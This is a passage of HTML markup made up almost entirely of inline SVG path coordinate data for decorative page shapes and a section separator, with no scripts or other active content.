d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path 